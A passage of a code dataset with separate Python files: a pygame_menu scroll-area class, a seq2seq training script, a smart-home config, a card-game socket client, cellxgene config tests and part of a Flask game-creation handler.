self._world.get_height() > self._rect.height:\n if _locals.POSITION_WEST in self._scrollbar_positions:\n rect.left += self._scrollbar_thick\n rect.width -= self._scrollbar_thick\n if _locals.POSITION_EAST in self._scrollbar_positions:\n rect.width -= self._scrollbar_thick\n if self._world.get_width() > self._rect.width - bars_total_width:\n if _locals.POSITION_NORTH in self._scrollbar_positions:\n rect.top += self._scrollbar_thick\n rect.height -= self._scrollbar_thick\n if _locals.POSITION_SOUTH in self._scrollbar_positions:\n rect.height -= 
self._scrollbar_thick\n\n if self._world.get_width() > self._rect.width:\n if _locals.POSITION_NORTH in self._scrollbar_positions:\n rect.top += self._scrollbar_thick\n rect.height -= self._scrollbar_thick\n if _locals.POSITION_SOUTH in self._scrollbar_positions:\n rect.height -= self._scrollbar_thick\n if self._world.get_height() > self._rect.height - bars_total_height:\n if _locals.POSITION_WEST in self._scrollbar_positions:\n rect.left += self._scrollbar_thick\n rect.width -= self._scrollbar_thick\n if _locals.POSITION_EAST in self._scrollbar_positions:\n rect.width -= self._scrollbar_thick\n\n return rect\n\n def get_world_size(self) -> Tuple2IntType:\n \"\"\"\n Return the world size.\n\n :return: Width, height in pixels\n \"\"\"\n if self._world is None:\n return 0, 0\n return self._world.get_width(), self._world.get_height()\n\n def _on_horizontal_scroll(self, value: NumberType) -> None:\n \"\"\"\n Call when a horizontal scroll bar as changed to update the\n position of the opposite one if it exists.\n\n :param value: New position of the slider\n :return: None\n \"\"\"\n for sbar in self._scrollbars:\n if sbar.get_orientation() == SCROLL_HORIZONTAL \\\n and self.get_hidden_width() != 0 \\\n and sbar.get_value() != value:\n sbar.set_value(value)\n\n def _on_vertical_scroll(self, value: NumberType) -> None:\n \"\"\"\n Call when a vertical scroll bar as changed to update the\n position of the opposite one if it exists.\n\n :param value: New position of the slider\n :return: None\n \"\"\"\n for sbar in self._scrollbars:\n if sbar.get_orientation() == SCROLL_VERTICAL \\\n and self.get_hidden_height() != 0 \\\n and sbar.get_value() != value:\n sbar.set_value(value)\n\n # noinspection PyTypeChecker\n def scroll_to_rect(self, rect: 'pygame.Rect', margin: NumberType = 10) -> bool:\n \"\"\"\n Ensure that the given rect is in the viewable area.\n\n :param rect: Rect in the world surface reference\n :param margin: Extra margin around the rect (px)\n :return: Scrollarea scrolled to rect. 
If ``False`` the rect was already inside the visible area\n \"\"\"\n assert isinstance(margin, (int, float))\n real_rect = self.to_real_position(rect)\n\n # Check rect is in viewable area\n sx = self.get_scrollbar_thickness(SCROLL_VERTICAL)\n sy = self.get_scrollbar_thickness(SCROLL_HORIZONTAL)\n if self._view_rect.topleft[0] <= real_rect.topleft[0] + sx \\\n and self._view_rect.topleft[1] <= real_rect.topleft[1] + sy \\\n and self._view_rect.bottomright[0] + sx >= real_rect.bottomright[0] \\\n and self._view_rect.bottomright[1] + sy >= real_rect.bottomright[1]:\n return False\n\n for sbar in self._scrollbars:\n if sbar.get_orientation() == SCROLL_HORIZONTAL and self.get_hidden_width():\n shortest_move = min(real_rect.left - margin - self._view_rect.left,\n real_rect.right + margin - self._view_rect.right, key=abs)\n value = min(sbar.get_maximum(), sbar.get_value() + shortest_move)\n value = max(sbar.get_minimum(), value)\n sbar.set_value(value)\n if sbar.get_orientation() == SCROLL_VERTICAL and self.get_hidden_height():\n shortest_move = min(real_rect.bottom + margin - self._view_rect.bottom,\n real_rect.top - margin - self._view_rect.top, key=abs)\n value = min(sbar.get_maximum(), sbar.get_value() + shortest_move)\n value = max(sbar.get_minimum(), value)\n sbar.set_value(value)\n return True\n\n def set_position(self, posx: int, posy: int) -> 'ScrollArea':\n \"\"\"\n Set the position.\n\n :param posx: X position\n :param posy: Y position\n :return: Self reference\n \"\"\"\n self._rect.x = posx\n self._rect.y = posy\n self._apply_size_changes()\n return self\n\n def set_world(self, surface: 'pygame.Surface') -> 'ScrollArea':\n \"\"\"\n Update the scrolled surface.\n\n :param surface: New world surface\n :return: Self reference\n \"\"\"\n self._world = surface\n self._apply_size_changes()\n return self\n\n def to_real_position(self, virtual: Union['pygame.Rect', Tuple2NumberType], visible: bool = False\n ) -> Union['pygame.Rect', Tuple2IntType]:\n \"\"\"\n Return the real position/Rect according to the scroll area origin\n of a position/Rect in the world surface reference.\n\n :param virtual: Position/Rect in the world surface reference\n :param visible: If a ``virtual`` is Rect object, return only the visible width/height\n :return: Real rect or real position\n \"\"\"\n assert isinstance(virtual, (pygame.Rect, tuple, list))\n offsets = self.get_offsets()\n\n if isinstance(virtual, pygame.Rect):\n rect = pygame.Rect(virtual)\n rect.x = self._rect.x + virtual.x - offsets[0]\n rect.y = self._rect.y + virtual.y - offsets[1]\n if visible:\n return self._view_rect.clip(rect) # Visible width and height\n return rect\n\n x_coord = self._rect.x + virtual[0] - offsets[0]\n y_coord = self._rect.y + virtual[1] - offsets[1]\n return int(x_coord), int(y_coord)\n\n def to_world_position(self, real: Union['pygame.Rect', Tuple2NumberType]\n ) -> Union['pygame.Rect', Tuple2IntType]:\n \"\"\"\n Return the position/Rect in the world surface reference\n of a real position/Rect according to the scroll area origin.\n\n :param real: Position/Rect according scroll area origin\n :return: Rect in world or position in world\n \"\"\"\n assert isinstance(real, (pygame.Rect, tuple, list))\n offsets = self.get_offsets()\n\n if isinstance(real, pygame.Rect):\n rect = pygame.Rect(real)\n rect.x = real.x - self._rect.x + offsets[0]\n rect.y = real.y - self._rect.y + offsets[1]\n return rect\n\n x_coord = real[0] - self._rect.x + offsets[0]\n y_coord = real[1] - self._rect.y + offsets[1]\n return int(x_coord), 
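The min(..., key=abs) expression in scroll_to_rect picks whichever scroll correction is smaller in magnitude. A worked example with invented numbers:

# Viewable area spans x = 100..400; target rect spans x = 420..470; margin = 10.
view_left, view_right = 100, 400
rect_left, rect_right = 420, 470
margin = 10

shortest_move = min(rect_left - margin - view_left,    # 310: align left edges
                    rect_right + margin - view_right,  # 80: just bring rect into view
                    key=abs)
print(shortest_move)  # 80 -> the horizontal scrollbar value grows by 80 px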
int(y_coord)\n\n def is_scrolling(self) -> bool:\n \"\"\"\n Return ``True`` if the user is scrolling.\n\n :return: ``True`` if user scrolls\n \"\"\"\n scroll = False\n for sbar in self._scrollbars:\n scroll = scroll or sbar.scrolling\n return scroll\n\n def update(self, events: List['pygame.event.Event']) -> bool:\n \"\"\"\n Called by end user to update scroll state.\n\n :param events: List of pygame events\n :return: ``True`` if updated\n \"\"\"\n updated = [0, 0]\n for sbar in self._scrollbars:\n if self.get_hidden_width() and sbar.get_orientation() == SCROLL_HORIZONTAL and not updated[0]:\n updated[0] = sbar.update(events)\n elif self.get_hidden_height() and sbar.get_orientation() == SCROLL_VERTICAL and not updated[1]:\n updated[1] = sbar.update(events)\n return updated[0] or updated[1]\n\n def set_menu(self, menu: 'pygame_menu.Menu') -> 'ScrollArea':\n \"\"\"\n Set the Menu reference.\n\n :param menu: Menu object\n :return: Self reference\n \"\"\"\n self._menu = menu\n for sbar in self._scrollbars:\n sbar.set_menu(menu)\n return self\n\n def get_menu(self) -> Optional['pygame_menu.Menu']:\n \"\"\"\n Return the Menu reference (if exists).\n\n :return: Menu reference\n \"\"\"\n return self._menu\n\n def collide(self, widget: 'pygame_menu.widgets.Widget', event: 'pygame.event.Event') -> bool:\n \"\"\"\n If user event collides a widget within the scroll area respect to the relative position.\n\n :param widget: Widget\n :param event: Pygame event\n :return: ``True`` if collide\n \"\"\"\n widget_rect = widget.get_rect()\n if hasattr(pygame, 'FINGERDOWN') and (\n event.type == pygame.FINGERDOWN or event.type == pygame.FINGERUP or\n event.type == pygame.FINGERMOTION):\n display_size = self._menu.get_window_size()\n finger_pos = (event.x * display_size[0], event.y * display_size[1])\n return bool(self.to_real_position(widget_rect).collidepoint(*finger_pos))\n else:\n return bool(self.to_real_position(widget_rect).collidepoint(*event.pos))\n\n def get_decorator(self) -> 'Decorator':\n \"\"\"\n Return the ScrollArea decorator API.\n\n .. note:: Menu drawing order:\n\n 1. Menu background color/image\n 2. Menu ``prev`` decorator\n 3. **Menu ScrollArea ``prev`` decorator**\n 4. **Menu ScrollArea widgets**\n 5. **Menu ScrollArea ``post`` decorator**\n 6. Menu title\n 7. 
Menu ``post`` decorator\n\n :return: Decorator API\n \"\"\"\n return self._decorator\n\n\nclass _ScrollAreaCopyException(Exception):\n \"\"\"\n If user tries to copy a ScrollArea.\n \"\"\"\n pass\n","sub_path":"pygame_menu/scrollarea.py","file_name":"scrollarea.py","file_ext":"py","file_size_in_byte":28661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"528244300","text":"import torch\nimport torch.nn as nn\nfrom torch import optim\nfrom data.dataset import SummarizationDataset\nfrom data.dataset import get_dataloader\nfrom models.AttnDecoderRNN import AttnDecoderRNN\nfrom models.EncoderRNN import EncoderRNN\nfrom data import cfg\nimport os, sys, time, math, random\nimport pdb\nfrom utils.model_saver_iter import load_model, save_model\n\nMAX_LENGTH = 500\nteacher_forcing_ratio = 0.5\n\n\ndef train(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer, criterion,\n max_length=MAX_LENGTH):\n encoder_hidden = encoder.initHidden(device)\n\n encoder_optimizer.zero_grad()\n decoder_optimizer.zero_grad()\n\n input_length = input_tensor.size(0)\n target_length = target_tensor.size(0)\n\n encoder_hiddens = torch.zeros(max_length, encoder.hidden_size, device=device)\n\n loss = 0\n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(input_tensor[ei], encoder_hidden)\n\n try:\n # here just use the hidden states of 1st dimension,\n # should be justified later\n encoder_hiddens[ei] = encoder_hidden[0, 0]\n except:\n pdb.set_trace()\n\n decoder_input = torch.tensor([[20000]], device=device)\n\n decoder_hidden = encoder_hidden\n\n use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False\n\n if use_teacher_forcing:\n # Teacher forcing: Feed the target as the next input\n for di in range(target_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_hiddens)\n loss += criterion(decoder_output, target_tensor[di].view(-1))\n decoder_input = target_tensor[di] # Teacher forcing\n\n else:\n # Without teacher forcing: use its own predictions as the next input\n for di in range(target_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_hiddens)\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach() # detach from history as input\n\n loss += criterion(decoder_output, target_tensor[di].view(-1))\n if decoder_input.item() == 200001:\n break\n\n loss.backward()\n\n encoder_optimizer.step()\n decoder_optimizer.step()\n\n return loss.item() / target_length\n\n\ndef trainIters(encoder, decoder, n_iters, checkpoint_dir, print_every=1000, plot_every=100, learning_rate=0.01,\n save_every=1000):\n start = time.time()\n plot_losses = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n\n encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n dataloader = get_dataloader(SummarizationDataset(\"data/finished/train.txt\", \"data/word2idx.json\"))\n\n criterion = nn.NLLLoss()\n start_iter = load_model(encoder, model_dir=checkpoint_dir, appendix='Encoder', iter=\"l\")\n start_iter_ = load_model(decoder, model_dir=checkpoint_dir, appendix='Decoder', iter=\"l\")\n assert start_iter == start_iter_\n\n data_iter = iter(dataloader)\n\n if start_iter < n_iters:\n\n for i in range(start_iter, n_iters):\n try:\n batch = 
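The coin flip in train() above (random.random() < teacher_forcing_ratio) feeds ground-truth tokens on roughly half of the iterations. A common refinement is to decay that ratio over training (scheduled sampling); the linear schedule below is an assumption, not part of this script:

import random

def use_teacher_forcing(iteration, n_iters, start_ratio=0.5):
    # Linearly decay the teacher-forcing probability from start_ratio to 0.
    ratio = start_ratio * (1.0 - float(iteration) / n_iters)
    return random.random() < ratio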
next(data_iter)\n except:\n data_iter = iter(dataloader)\n batch = next(data_iter)\n\n input_tensor = batch[0][0].to(device)\n target_tensor = batch[1][0].to(device)\n\n loss = train(input_tensor, target_tensor, encoder,\n decoder, encoder_optimizer, decoder_optimizer, criterion)\n print_loss_total += loss\n plot_loss_total += loss\n\n if i % print_every == 0:\n print_loss_avg = print_loss_total / print_every\n print_loss_total = 0\n print('(%d %d%%) %.4f' % (i, i / n_iters * 100, print_loss_avg))\n\n if i % plot_every == 0:\n plot_loss_avg = plot_loss_total / plot_every\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n\n # Save checkpoint\n # torch.save(encoder.state_dict(), os.path.join(checkpoint_dir, \"encoder_{}.pth\".format(iter)))\n # torch.save(decoder.state_dict(), os.path.join(checkpoint_dir, \"decoder_{}.pth\".format(iter)))\n if (i + 1) % save_every == 0:\n save_model(encoder, model_dir=checkpoint_dir, appendix=\"Encoder\", iter=i + 1, save_num=3,\n save_step=save_every)\n save_model(decoder, model_dir=checkpoint_dir, appendix=\"Decoder\", iter=i + 1, save_num=3,\n save_step=save_every)\n # showPlot(plot_losses)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"USAGE: python train.py \")\n sys.exit()\n checkpoint_dir = sys.argv[1]\n\n device = torch.device('cuda:0')\n hidden_size = 256\n weights = torch.load(\"data/GloVe_embeddings.pt\")\n encoder1 = EncoderRNN(weights, cfg.EMBEDDING_SIZE, cfg.HIDDEN_SIZE, 2, dropout_p=0.1).to(device)\n attn_decoder1 = AttnDecoderRNN(weights, cfg.HIDDEN_SIZE, 200003, 2, dropout_p=0.1).to(device)\n\n if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir)\n\n trainIters(encoder1, attn_decoder1, 10000, checkpoint_dir, print_every=10, save_every=100)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"313902373","text":"from google.oauth2 import service_account\nimport os, sys\n\nDIALOGFLOW_CREDENTIALS_PATH = \"credentials/smart-home.json\"\nDIALOGFLOW_PROJECT_ID = 'smart-home-1-6c30f'\nDIALOGFLOW_LANGUAGE_CODE = 'pt-BR'\nROUTINES_JSON_PATH = \"configs/routines.json\"\n\nGOOGLE_APPLICATION_CREDENTIALS = service_account.Credentials.from_service_account_file(DIALOGFLOW_CREDENTIALS_PATH)\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = DIALOGFLOW_CREDENTIALS_PATH\n\nSIMULATION = False\nSILENT_MODE = False\n\nif len(sys.argv) > 1:\n if sys.argv[1] == \"SIMULATE\":\n SIMULATION = True\n print(\"* SIMULATION ON\")\n\nif len(sys.argv) > 2:\n if sys.argv[2] == \"SILENT\":\n SILENT_MODE = True\n print(\"* SILENT_MODE enabled: type your phrases at will.\")\n","sub_path":"src/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"407870533","text":"customer_29876 = {'First Name': 'Fred', 'Last Name': 'Sharapov', 'Address': '505 Elmwood Ave'}\njobs_to_do_list = ['email', 'texting', 'calls']\n\nprint(customer_29876[\"First Name\"])\n\n# del customer_29876[\"Last Name\"]\n# print(customer_29876[\"First Name\"])\n\nfor each_value in customer_29876.keys():\n print(each_value)\n\nfor e, each_value in customer_29876.items():\n print(\"The customer's \" + e + \" is \" + each_value)\n\ncustomers = [\n {\"Customer ID\": 0,\n \"First Name\": \"Fred\",\n \"Last Name\": \"Sharapov\"},\n {\"Customer ID\": 1,\n \"First Name\": \"David\",\n \"Last Name\": \"de Heer\"},\n 
{\"Customer ID\": 2,\n \"First Name\": \"Faha\",\n \"Last Name\": \"Sharapov\"},\n]\n\ncustomer_first_name = customers[0]\ncustomer_name = customer_first_name[\"Last Name\"]\nlen_customer = len(customers)\nprint(len_customer)\n","sub_path":"ch10_conditional_statements.py","file_name":"ch10_conditional_statements.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"157611488","text":"# imports\nfrom socket import *\nimport threading\nimport json\n\"\"\"\nNOTE: EMAIL MUST BE A GMAIL ACCOUNT\n\"\"\"\n\n# Class creates connection with server\nclass TakiClient:\n def __init__(self):\n # class variables\n self.player = {}\n self.client_socket = None\n self.turn = {}\n self.current_card = {}\n self.win = {}\n self.your_turn = False\n self.cards_drawn = []\n\n def create_socket(self):\n # function creates connection with server if possible\n ip = '10.0.0.12'\n port = 8007\n try:\n self.client_socket = socket()\n self.client_socket.connect((ip, port))\n print(\"Connected to host successfully!\")\n except:\n print(\"problem with connection\")\n\n def join_game(self, details):\n # function receives player details and joins the player via login or register to the game.\n # returns true if possible, otherwise false.\n is_register = \"register\" in details.keys()\n is_login = \"login\" in details.keys()\n self.player = {'user_name': details['user_name']}\n self.client_socket.send(json.dumps(details).encode())\n msg = json.loads(self.client_socket.recv(1024).decode())\n if is_login and msg['login'] == 'failed':\n return False\n if is_register and msg['register'] == 'failed':\n return False\n return True\n\n def start_game(self):\n # function starts game\n start_dict = json.loads(self.client_socket.recv(1024).decode())\n self.turn = start_dict['turn']\n self.player['hand'] = start_dict['hand']\n self.current_card = start_dict['current_card']\n\n def send_card(self, card):\n # function receives a card and removes it from thr player's hand and sends card details to server.\n self.player['hand'].remove(card)\n self.client_socket.send(json.dumps({'card': card,\n 'hand': self.player['hand']}).encode())\n\n def wait_turndata(self):\n # function makes the player wait till it is his turn\n turn_data = json.loads(self.client_socket.recv(1024).decode())\n self.win = turn_data['win']\n if not self.win:\n self.current_card = turn_data['current_card']\n self.cards_drawn = turn_data['draw_cards']\n self.draw_cards(self.cards_drawn)\n \n def draw_cards(self, cards):\n # function recieves cards and adds them to player's hand\n for card in cards:\n self.player['hand'].append(card)\n\n def receive_card(self):\n # function returns the card that was chosen by other players\n return json.loads(self.client_socket.recv(1024).decode())\n\n def change_cardcolor(self, wild_card, color):\n # function receives wild card and color\n # and changes the color of the wild card into the color that was chosen by player who used card.\n for card in self.player['hand']:\n if card['type'] == wild_card['type']:\n card['color'] = color\n\n def close_connection(self):\n # function closes connection with server\n if self.client_socket != None:\n self.client_socket.close()","sub_path":"TakiClient.py","file_name":"TakiClient.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"227572700","text":"import time\nimport traceback\n\nfrom itcast.autotest.kw.domain 
import Report\nfrom itcast.autotest.kw.utils import DriverUtil, TestCaseUtil, ReportUtil\n\n\ndef start():\n    print('start...')\n    driver = DriverUtil.get_driver()\n\n    try:\n        report = Report()\n        report.startTime = time.time()\n\n        # Load the test case suite\n        case_list = TestCaseUtil.load_case_list()\n\n        # Execute the test cases\n        for test_case in case_list.test_case_list:\n            print('------start execute case=[{}]'.format(test_case.case_desc))\n            TestCaseUtil.execute_test_case(driver, test_case)\n            print('------end execute case=[{}]'.format(test_case.case_desc))\n        report.endTime = time.time()\n\n        # Generate the test report\n        ReportUtil.create_report(case_list, report)\n    except Exception:\n        traceback.print_exc()\n    finally:\n        DriverUtil.quit_driver()\n\n\nif __name__ == '__main__':\n    start()\n","sub_path":"autotest/kw/run_suite.py","file_name":"run_suite.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"13766047","text":"import json\nimport os\nimport tempfile\n\nimport unittest\nfrom unittest.mock import patch\n\nfrom backend.czi_hosted.common.annotations.hosted_tiledb import AnnotationsHostedTileDB\nfrom backend.czi_hosted.common.annotations.local_file_csv import AnnotationsLocalFile\nfrom backend.czi_hosted.common.config.app_config import AppConfig\nfrom backend.czi_hosted.common.config.base_config import BaseConfig\nfrom backend.test import PROJECT_ROOT, FIXTURES_ROOT\n\nfrom backend.common.errors import ConfigurationError\nfrom backend.test.test_czi_hosted.unit.common.config import ConfigTests\n\n\nclass TestDatasetConfig(ConfigTests):\n    def setUp(self):\n        self.config_file_name = f\"{unittest.TestCase.id(self).split('.')[-1]}.yml\"\n        self.config = AppConfig()\n        self.config.update_server_config(app__flask_secret_key=\"secret\")\n        self.config.update_server_config(multi_dataset__dataroot=FIXTURES_ROOT)\n        self.dataset_config = self.config.default_dataset_config\n        self.config.complete_config()\n        message_list = []\n\n        def noop(message):\n            message_list.append(message)\n\n        messagefn = noop\n        self.context = dict(messagefn=messagefn, messages=message_list)\n\n    def get_config(self, **kwargs):\n        file_name = self.custom_app_config(\n            dataroot=f\"{FIXTURES_ROOT}\", config_file_name=self.config_file_name, **kwargs\n        )\n        config = AppConfig()\n        config.update_from_config_file(file_name)\n        return config\n\n    def test_init_dataset_config_sets_vars_from_default_config(self):\n        config = AppConfig()\n        self.assertEqual(config.default_dataset_config.presentation__max_categories, 1000)\n        self.assertEqual(config.default_dataset_config.user_annotations__type, \"local_file_csv\")\n        self.assertEqual(config.default_dataset_config.diffexp__lfc_cutoff, 0.01)\n\n    @patch(\"backend.czi_hosted.common.config.dataset_config.BaseConfig.validate_correct_type_of_configuration_attribute\")\n    def test_complete_config_checks_all_attr(self, mock_check_attrs):\n        mock_check_attrs.side_effect = BaseConfig.validate_correct_type_of_configuration_attribute()\n        self.dataset_config.complete_config(self.context)\n        self.assertEqual(mock_check_attrs.call_count, 19)\n\n    def test_app_sets_script_vars(self):\n        config = self.get_config(scripts=[\"path/to/script\"])\n        config.default_dataset_config.handle_app()\n\n        self.assertEqual(config.default_dataset_config.app__scripts, [{\"src\": \"path/to/script\"}])\n\n        config = self.get_config(scripts=[{\"src\": \"path/to/script\", \"more\": \"different/script/path\"}])\n        config.default_dataset_config.handle_app()\n        self.assertEqual(\n            
config.default_dataset_config.app__scripts, [{\"src\": \"path/to/script\", \"more\": \"different/script/path\"}]\n )\n\n config = self.get_config(scripts=[\"path/to/script\", \"different/script/path\"])\n config.default_dataset_config.handle_app()\n # TODO @madison -- is this the desired functionality?\n self.assertEqual(\n config.default_dataset_config.app__scripts, [{\"src\": \"path/to/script\"}, {\"src\": \"different/script/path\"}]\n )\n\n config = self.get_config(scripts=[{\"more\": \"different/script/path\"}])\n with self.assertRaises(ConfigurationError):\n config.default_dataset_config.handle_app()\n\n def test_handle_user_annotations_ensures_auth_is_enabled_with_valid_auth_type(self):\n config = self.get_config(enable_users_annotations=\"true\", authentication_enable=\"false\")\n config.server_config.complete_config(self.context)\n with self.assertRaises(ConfigurationError):\n config.default_dataset_config.handle_user_annotations(self.context)\n\n config = self.get_config(enable_users_annotations=\"true\", authentication_enable=\"true\", auth_type=\"pretend\")\n with self.assertRaises(ConfigurationError):\n config.server_config.complete_config(self.context)\n\n def test_handle_user_annotations__adds_warning_message_if_annotation_vars_set_when_annotations_disabled(self):\n config = self.get_config(\n enable_users_annotations=\"false\", authentication_enable=\"false\", db_uri=\"shouldnt/be/set\"\n )\n config.default_dataset_config.handle_user_annotations(self.context)\n\n self.assertEqual(self.context[\"messages\"], [\"Warning: db_uri ignored as annotations are disabled.\"])\n\n @patch(\"backend.czi_hosted.common.config.dataset_config.DbUtils\")\n def test_handle_user_annotations__instantiates_user_annotations_class_correctly(self, mock_db_utils):\n mock_db_utils.return_value = \"123\"\n config = self.get_config(\n enable_users_annotations=\"true\", authentication_enable=\"true\", annotation_type=\"local_file_csv\"\n )\n config.server_config.complete_config(self.context)\n config.default_dataset_config.handle_user_annotations(self.context)\n self.assertIsInstance(config.default_dataset_config.user_annotations, AnnotationsLocalFile)\n\n config = self.get_config(\n enable_users_annotations=\"true\",\n authentication_enable=\"true\",\n annotation_type=\"hosted_tiledb_array\",\n db_uri=\"gotta/set/this\",\n hosted_file_directory=\"and/this\",\n )\n config.server_config.complete_config(self.context)\n config.default_dataset_config.handle_user_annotations(self.context)\n self.assertIsInstance(config.default_dataset_config.user_annotations, AnnotationsHostedTileDB)\n\n config = self.get_config(\n enable_users_annotations=\"true\", authentication_enable=\"true\", annotation_type=\"NOT_REAL\"\n )\n config.server_config.complete_config(self.context)\n with self.assertRaises(ConfigurationError):\n config.default_dataset_config.handle_user_annotations(self.context)\n\n def test_handle_local_file_csv_annotations__sets_dir_if_not_passed_in(self):\n config = self.get_config(\n enable_users_annotations=\"true\", authentication_enable=\"true\", annotation_type=\"local_file_csv\"\n )\n config.server_config.complete_config(self.context)\n config.default_dataset_config.handle_local_file_csv_annotations()\n self.assertIsInstance(config.default_dataset_config.user_annotations, AnnotationsLocalFile)\n cwd = os.getcwd()\n self.assertEqual(config.default_dataset_config.user_annotations._get_output_dir(), cwd)\n\n def test_handle_diffexp__raises_warning_for_large_datasets(self):\n config = 
self.get_config(lfc_cutoff=0.02, enable_difexp=\"true\", top_n=15)\n config.server_config.complete_config(self.context)\n config.default_dataset_config.handle_diffexp(self.context)\n self.assertEqual(len(self.context[\"messages\"]), 0)\n\n def test_multi_dataset(self):\n config = AppConfig()\n # test for illegal url_dataroots\n for illegal in (\"../b\", \"!$*\", \"\\\\n\", \"\", \"(bad)\"):\n config.update_server_config(\n app__flask_secret_key=\"secret\",\n multi_dataset__dataroot={\"tag\": {\"base_url\": illegal, \"dataroot\": f\"{PROJECT_ROOT}/example-dataset\"}},\n )\n with self.assertRaises(ConfigurationError):\n config.complete_config()\n\n # test for legal url_dataroots\n for legal in (\"d\", \"this.is-okay_\", \"a/b\"):\n config.update_server_config(\n app__flask_secret_key=\"secret\",\n multi_dataset__dataroot={\"tag\": {\"base_url\": legal, \"dataroot\": f\"{PROJECT_ROOT}/example-dataset\"}},\n )\n config.complete_config()\n\n # test that multi dataroots work end to end\n config.update_server_config(\n app__flask_secret_key=\"secret\",\n multi_dataset__dataroot=dict(\n s1=dict(dataroot=f\"{PROJECT_ROOT}/example-dataset\", base_url=\"set1/1/2\"),\n s2=dict(dataroot=f\"{FIXTURES_ROOT}\", base_url=\"set2\"),\n s3=dict(dataroot=f\"{FIXTURES_ROOT}\", base_url=\"set3\"),\n ),\n )\n\n # Change this default to test if the dataroot overrides below work.\n config.update_default_dataset_config(app__about_legal_tos=\"tos_default.html\")\n\n # specialize the configs for set1\n config.add_dataroot_config(\n \"s1\", user_annotations__enable=False, diffexp__enable=True, app__about_legal_tos=\"tos_set1.html\"\n )\n\n # specialize the configs for set2\n config.add_dataroot_config(\n \"s2\", user_annotations__enable=True, diffexp__enable=False, app__about_legal_tos=\"tos_set2.html\"\n )\n\n # no specializations for set3 (they get the default dataset config)\n config.complete_config()\n\n server = self.create_app(config)\n\n server.testing = True\n session = server.test_client()\n\n response = session.get(\"/set1/1/2/pbmc3k.h5ad/api/v0.2/config\")\n data_config = json.loads(response.data)\n\n assert data_config[\"config\"][\"displayNames\"][\"dataset\"] == \"pbmc3k\"\n assert data_config[\"config\"][\"parameters\"][\"annotations\"] is False\n assert data_config[\"config\"][\"parameters\"][\"disable-diffexp\"] is False\n assert data_config[\"config\"][\"parameters\"][\"about_legal_tos\"] == \"tos_set1.html\"\n\n response = session.get(\"/set2/pbmc3k.cxg/api/v0.2/config\")\n data_config = json.loads(response.data)\n assert data_config[\"config\"][\"displayNames\"][\"dataset\"] == \"pbmc3k\"\n assert data_config[\"config\"][\"parameters\"][\"annotations\"] is True\n assert data_config[\"config\"][\"parameters\"][\"about_legal_tos\"] == \"tos_set2.html\"\n\n response = session.get(\"/set3/pbmc3k.cxg/api/v0.2/config\")\n data_config = json.loads(response.data)\n assert data_config[\"config\"][\"displayNames\"][\"dataset\"] == \"pbmc3k\"\n assert data_config[\"config\"][\"parameters\"][\"annotations\"] is True\n assert data_config[\"config\"][\"parameters\"][\"disable-diffexp\"] is False\n assert data_config[\"config\"][\"parameters\"][\"about_legal_tos\"] == \"tos_default.html\"\n\n response = session.get(\"/health\")\n\n assert json.loads(response.data)[\"status\"] == \"pass\"\n\n def test_configfile_with_specialization(self):\n # test that per_dataset_config config load the default config, then the specialized config\n\n with tempfile.TemporaryDirectory() as tempdir:\n configfile = 
os.path.join(tempdir, \"config.yaml\")\n with open(configfile, \"w\") as fconfig:\n config = \"\"\"\n server:\n multi_dataset:\n dataroot:\n test:\n base_url: test\n dataroot: fake_dataroot\n\n dataset:\n user_annotations:\n enable: false\n type: hosted_tiledb_array\n hosted_tiledb_array:\n db_uri: fake_db_uri\n hosted_file_directory: fake_dir\n\n per_dataset_config:\n test:\n user_annotations:\n enable: true\n \"\"\"\n fconfig.write(config)\n\n app_config = AppConfig()\n app_config.update_from_config_file(configfile)\n\n test_config = app_config.dataroot_config[\"test\"]\n\n # test config from default\n self.assertEqual(test_config.user_annotations__type, \"hosted_tiledb_array\")\n self.assertEqual(test_config.user_annotations__hosted_tiledb_array__db_uri, \"fake_db_uri\")\n\n # test config from specialization\n self.assertTrue(test_config.user_annotations__enable)\n","sub_path":"backend/test/test_czi_hosted/unit/common/config/test_dataset_config.py","file_name":"test_dataset_config.py","file_ext":"py","file_size_in_byte":11777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"362470462","text":"import logging\n\nfrom flask import request\nfrom flask_api import status\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom card_broker.models.game_state import GameState\nfrom card_broker.models.player_state import PlayerState\nfrom card_broker.models.game_info import GameInfo\n\nfrom card_broker.shared.card_operations.initial_game_state import (\n create_initial_game_state,\n create_initial_player_state\n)\nfrom card_broker.shared.db import get_new_db_session\nfrom card_broker.shared.card_service_calls import get_card_list\n\nlogger = logging.getLogger('card_broker')\n\ndef new_game():\n \"\"\"\n handles request to create new game\n \"\"\"\n request_data = request.get_json()\n game_id = request_data['gameId']\n\n card_list = get_card_list(game_id)\n\n initial_state = create_initial_game_state(card_list)\n\n new_game_info = GameInfo(game_id=game_id, players=request_data['players'])\n\n new_game = GameState(game_id=game_id, 